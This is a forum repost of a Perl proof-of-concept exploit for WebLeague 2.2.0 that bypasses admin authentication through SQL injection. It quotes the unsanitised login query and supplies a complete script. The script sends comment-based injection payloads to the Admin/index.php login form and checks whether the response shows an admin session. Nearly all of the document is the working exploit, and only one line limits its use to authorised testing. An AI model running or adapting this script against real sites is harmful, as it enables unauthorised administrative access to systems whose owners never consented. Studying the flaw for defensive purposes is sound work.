

    webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit



    webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit

    Post by Foxi on Thu Jul 23, 2009 4:16 am

    Code:
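    #!/usr/bin/perl -W
    #
    # WebLeague 2.2.0 Remote Admin Bypass PoC
    # written by ka0x <ka0x01[at]gmail.com>
    #
    # Requires magic_quotes_gpc = Off on the target: the payload depends on
    # unescaped single quotes reaching the query string.
    #
    # Vuln code (Admin/index.php) :
    #
    # 10:   $sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
    # 11:   $result=mysql_query($sql,$db);
    # 12:   $number = mysql_num_rows($result);
    # 13:   if ($number == "1") {
    #
    # NOTE: line 13 accepts the login only when exactly one row comes back.
    # The comment-based bypass below removes the WHERE restriction entirely,
    # so it succeeds only if the admin table holds a single row; a "not
    # vulnerable" result therefore does not prove the query is safe.
    # Use only against systems you are authorised to test.
    #

    use strict;
    use warnings;
    use LWP::UserAgent ;

    # Seconds to wait for the target before giving up.
    my $timeout = 10 ;

    die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

    my $host = $ARGV[0] ;

    # Normalise the target to "<scheme>://host[/path]/" so the Admin path can
    # simply be appended. Accept an https:// target as given; the original
    # test matched only "http:" and would have prefixed https URLs with a
    # second scheme.
    $host = 'http://'.$host unless $host =~ m{^https?://}i ;
    $host .= '/' unless substr( $host, -1 ) eq '/' ;

    my $ua = LWP::UserAgent->new() or die "cannot create LWP::UserAgent\n";
    $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
    $ua->timeout( $timeout ) ;

    # Once both values are interpolated at line 10 the query reads:
    #   ... WHERE name = ''/*' AND password = '*/ or ''=''
    # The /* ... */ block comment swallows the password check and ''='' is
    # always true, so every row of $admintable is returned.
    my %form = (
        username => q{'/*},
        password => q{*/ or ''='},
    );

    # Let LWP build and URL-encode the form body; the hand-built body left
    # the quotes, spaces and the '=' inside the password value unencoded.
    my $res = $ua->post( $host.'Admin/index.php', \%form ) ;

    # Distinguish "could not reach the target" from "target did not log us
    # in", otherwise a timeout, DNS failure or 404 is silently reported as
    # not vulnerable.
    die "[!] Request failed: " . $res->status_line . "\n" unless $res->is_success ;

    if( $res->content =~ /You are logged in as/i ){
       print "[+] The website is vulnerable.\n" ;
    }
    else {
       print "[-] The website isn't vulnerable (or the admin table holds more than one row).\n" ;
    }


    __END__

    # milw0rm.com [2009-07-16]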

